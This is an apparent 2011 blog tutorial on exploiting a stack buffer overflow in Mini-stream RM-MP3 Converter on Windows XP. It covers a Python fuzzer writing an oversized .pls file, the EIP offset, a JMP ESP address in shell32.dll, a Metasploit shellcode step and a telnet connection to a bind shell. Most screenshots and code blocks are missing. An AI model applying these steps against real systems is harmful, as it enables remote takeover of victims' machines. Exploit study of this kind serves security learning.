Sunday, December 4, 2011

reverse enginnering Mini-stream RM-MP3 Converter (no SEH)

-->
target : Mini-stream RM-MP3 Converter
tools : python, ollydbg/Immunity Debugger, pattern_create, pattern_offset
OS : windows XP sp 2

-->
SS target :
-->
fuzzer :

hex = "http://."+"\x41" * 18000 #http://. To load file \x41
f=open("semangka.pls","w") #make file semangka.pls
f.write(hex)
f.close()

-->
step by step :
  1. install application in windows, and running Mini-stream RM-MP3 Converter and ollydbg.
  2. Attach that application in ollydbg.
  3. Load semangka.pls and this is the result :










    4. now, we must find much buffer in EIP, we can modification our fuzzer :
     

    5. after then running our fuzzer, and we get :








6. now we use pattern_offset like this :





7. and this is modification our fuzzer :









8. and this is the result :




address register of EIP as DEADBEEF, so the conclude is register EIP need 17416+8 to concern stack. And if stack can overwrite, we can to contempt payload in stack. So we must modif again our fuzzer.
9. It's new modif fuzzer :






first hex is upload \x90 * 17416, and second hex is overwrite address of EIP as DEADBEEF,thrid hex is to entrust command no operations \x90 *(17424-long of hex before this hex), and fourth hex is upload character C *(20000-long of hex before this hex). And this is the SS :







10. now we ust find command JMP ESP to sorcery on EIP to access PAYLOAD in buffer memory.
11.The step to find JMP ESP is open executable modules, and choose library file who can use to EIP register to enter into stack. In this case, we use user32.dll. double click user32.dll, so it will be open new window. And right click to search command JMP ESP.
12. and we get JMP ESP command, so we can write address of JMP ESP(77D8AF0A) to change DEADBEEF.
13. And this is the script our new fuzzer :

--> -->






14. ok, we can try again to fuzzer the application, but it's not our hope, the fuzzer can't direct in stack in memory, so we can try shell32.dll to find address of JMP ESP. open the executable modules choose shell32.dll, and find address of JMP ESP. JMP ESP address at 7CA58265
15. so, we must modif again our fuzzer, like this :






16. now we can restart the application, and running our fuzzer. And we can see that fuzzer can direct in stack memory :










17. now we can generate payload with use metasploit. And modif our fuzzer with payload from metasploit :













18. running the application without ollydbg, and load fuzzer. after we are upload fuzer, the application will be error :









19. open konsole and enter command telnet 192.168.56.101 4444.








20. so windows can we are control like this :







and the result is windows will be shutdown in 30 second :











and FINISHED :D
-=CMIIW=-
-->